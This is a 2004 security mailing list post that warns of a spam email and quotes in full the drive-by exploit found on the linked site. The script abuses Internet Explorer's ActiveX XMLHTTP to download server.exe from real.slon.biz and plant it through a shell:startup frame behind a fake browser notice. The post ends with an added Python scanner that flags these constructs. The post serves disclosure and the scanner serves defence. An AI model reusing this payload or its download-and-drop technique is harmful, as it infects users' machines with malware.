Open Source and information security mailing list archives
Message-ID: <413D7DB9.DF3FE8A0@gmx.de>
From: shugal at gmx.de (Martin Stricker)
Subject: Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle
 shot!]

I just got the attached e-mail. On the linked website I found this exploit
code (sorry for the line breaks):
<script>
function govuln(){ 
var w=window.open("javascript:setInterval(function(){try{var
tempvar=opener.location.href;}catch(e){location.assign('javascript:var
xmlHTTP = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);xmlHTTP.open
(&quot;GET&quot;,&quot;http://real.slon.biz/server.exe&quot;,false);xmlHTTP.send();var
contents =
xmlHTTP.responseBody;document.innerHTML=(&quot;&lt;title&gt;You Need a
better browser&lt;/title&gt;&lt;DIV ID=DS2 align=center
style=position:absolute;left:10;top:-30;&gt;&lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;font
face=arial color=black&gt;&lt;b&gt;This web page requires Opera
Comptable browser&lt;/b&gt;&amp;nbspYou can download Opera from the
&lt;a href=http://www.opera.com&gt;Opera &lt;frame src=log.php
name=frame1 scrolling=no frameborder=no noresize=noresize&gt;Software
Group web
site&lt;/a&gt;.&lt;/center&gt;&lt;/div&gt;&lt;html&gt;&lt;iframe
src=shell:startup HEIGHT=5000; WIDTH=5000
style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-index:-90;&gt;&lt;/iframe&gt;&lt;body
onload=showpop()&gt;&lt;script&gt;function
showpop(){pop=window.createPopup();pop.document.body.style.margin=0;pop.document.body.innerHTML=txt.value;pop.show(100,100,screen.width+300,screen.height+300);}&lt;/script&gt;&lt;span
style=position: absolute; left: 1; top: 1
id=absspan&gt;&lt;/span&gt;&lt;textarea id=txt rows=1 cols=20
style=display:none&gt;&lt;html&gt;&lt;body&gt;&lt;table width=100%
height=100%&gt;&lt;tr ALIGN=LEFT
VALIGN=TOP&gt;&lt;br&gt;&lt;center&gt;&lt;img
src=http://real.slon.biz/server.exe id=anch
onmousedown=parent.pop.show(1,1,1,1);
style=width=4000px;height=4000px;background-image:url(&amp;quot;http://real.slon.biz/1.gif&amp;quot;);&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/textarea&gt;&lt;/body&gt;&lt;/html&gt;&quot;)');window.close();}},100)","_blank","height=10,width=10,left=10000,top=10000"); 
w.location.assign=location.assign; 
location.href="http://localhost"; 
} 
govuln() 
</script>
-- 
Homepage: http://www.martin-stricker.de/
Linux Migration Project: http://www.linux-migration.org/
Webmaster-Forum: http://www.masterportal24.com/cgi-bin/yindex.cgi
Red Hat Linux 9 for low memory: http://www.rule-project.org/
Registered Linux user #210635: http://counter.li.org/
-------------- next part --------------
An embedded message was scrubbed...
From: CNN News Germany <gil@...v.de>
Subject: George Bush sniper-rifle shot!
Date: Sat, 04 Sep 2004 03:25:28 +0000
Size: 2407
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040907/14b5d37a/attachment.mht
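
A defender-side check for the script quoted in the message above, as an added example that is not part of the original post: it undoes mail line wrapping and nested HTML entity encoding (the quoted script uses both `&quot;` and `&amp;quot;`), then looks for the constructs visible in that script. The indicator names, the `normalize` and `scan` helpers and the `example.invalid` sample are assumptions made for illustration.

```python
import html
import re

# Constructs visible in the quoted script; the names are labels chosen
# for this example, not identifiers from any product or signature set.
INDICATORS = {
    "activex_xmlhttp": re.compile(
        r"new\s+ActiveXObject\s*\(\s*[\"']Microsoft\.XMLHTTP", re.I),
    "shell_startup_frame": re.compile(
        r"<i?frame[^>]*\bsrc\s*=\s*[\"']?shell:", re.I),
    "javascript_url_navigation": re.compile(
        r"(?:window\.open|location\.assign)\s*\(\s*[\"']javascript:", re.I),
    "create_popup": re.compile(r"\bcreatePopup\s*\(", re.I),
    "exe_as_image": re.compile(
        r"<img[^>]*\bsrc\s*=\s*[\"']?[^\s\"'>]+\.exe\b", re.I),
}

def normalize(text, max_rounds=5):
    """Join wrapped lines, then decode HTML entities until stable."""
    text = re.sub(r"\s*\r?\n\s*", " ", text)
    for _ in range(max_rounds):  # bounded: each round peels one layer
        decoded = html.unescape(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan(text):
    """Return the sorted names of indicators found after normalization."""
    norm = normalize(text)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(norm))

# Constructed, non-functional sample that mirrors the wrapping and the
# entity nesting of the quoted script; the host is a placeholder.
SAMPLE = """<script>
var w=window.open("javascript:location.assign('javascript:var x = new
ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);x.open
(&quot;GET&quot;,&quot;http://example.invalid/a.exe&quot;,false);
document.innerHTML=(&quot;&lt;iframe
src=shell:startup&gt;&lt;/iframe&gt;&lt;img
src=http://example.invalid/a.exe
style=background-image:url(&amp;quot;http://example.invalid/1.gif&amp;quot;)&gt;&quot;)')","_blank");
</script>"""

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print("indicator:", hit)
```

Matching the raw text without `normalize` misses the frame and ActiveX indicators, because their quotes and angle brackets only exist after decoding.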
